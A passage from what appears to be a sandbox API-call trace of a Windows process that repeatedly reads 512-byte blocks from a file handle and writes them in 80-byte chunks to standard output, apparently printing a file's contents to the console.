lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.301] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] GetFileType (hFile=0x4c) returned 0x1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] GetFileType (hFile=0x4c) returned 0x1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] GetFileType (hFile=0x4c) returned 0x1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] GetFileType (hFile=0x4c) returned 0x1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] GetFileType (hFile=0x4c) returned 0x1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] GetFileType (hFile=0x4c) returned 0x1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] GetFileType (hFile=0x4c) returned 0x1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] GetFileType (hFile=0x4c) returned 0x1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.302] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.302] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] GetFileType (hFile=0x4c) returned 0x1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] GetFileType (hFile=0x4c) returned 0x1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] GetFileType (hFile=0x4c) returned 0x1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] GetFileType (hFile=0x4c) returned 0x1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] GetFileType (hFile=0x4c) returned 0x1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] GetFileType (hFile=0x4c) returned 0x1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] GetFileType (hFile=0x4c) returned 0x1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] GetFileType (hFile=0x4c) returned 0x1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.303] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.303] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.303] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] GetFileType (hFile=0x4c) returned 0x1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] GetFileType (hFile=0x4c) returned 0x1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] GetFileType (hFile=0x4c) returned 0x1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] GetFileType (hFile=0x4c) returned 0x1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] GetFileType (hFile=0x4c) returned 0x1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] GetFileType (hFile=0x4c) returned 0x1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] GetFileType (hFile=0x4c) returned 0x1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] GetFileType (hFile=0x4c) returned 0x1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.304] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.304] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] GetFileType (hFile=0x4c) returned 0x1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] GetFileType (hFile=0x4c) returned 0x1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] GetFileType (hFile=0x4c) returned 0x1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] GetFileType (hFile=0x4c) returned 0x1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] GetFileType (hFile=0x4c) returned 0x1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] GetFileType (hFile=0x4c) returned 0x1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] GetFileType (hFile=0x4c) returned 0x1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] GetFileType (hFile=0x4c) returned 0x1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.305] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.305] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.305] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.305] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] GetFileType (hFile=0x4c) returned 0x1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] GetFileType (hFile=0x4c) returned 0x1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] GetFileType (hFile=0x4c) returned 0x1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] GetFileType (hFile=0x4c) returned 0x1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] GetFileType (hFile=0x4c) returned 0x1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] GetFileType (hFile=0x4c) returned 0x1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] GetFileType (hFile=0x4c) returned 0x1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] GetFileType (hFile=0x4c) returned 0x1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.306] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.306] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] GetFileType (hFile=0x4c) returned 0x1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] GetFileType (hFile=0x4c) returned 0x1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] GetFileType (hFile=0x4c) returned 0x1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] GetFileType (hFile=0x4c) returned 0x1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] GetFileType (hFile=0x4c) returned 0x1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] GetFileType (hFile=0x4c) returned 0x1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] GetFileType (hFile=0x4c) returned 0x1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] GetFileType (hFile=0x4c) returned 0x1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.307] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.307] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] GetFileType (hFile=0x4c) returned 0x1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] GetFileType (hFile=0x4c) returned 0x1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] GetFileType (hFile=0x4c) returned 0x1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] GetFileType (hFile=0x4c) returned 0x1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] GetFileType (hFile=0x4c) returned 0x1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] GetFileType (hFile=0x4c) returned 0x1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] GetFileType (hFile=0x4c) returned 0x1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] GetFileType (hFile=0x4c) returned 0x1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.308] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.308] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.308] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.308] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x32, lpOverlapped=0x0) returned 1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c 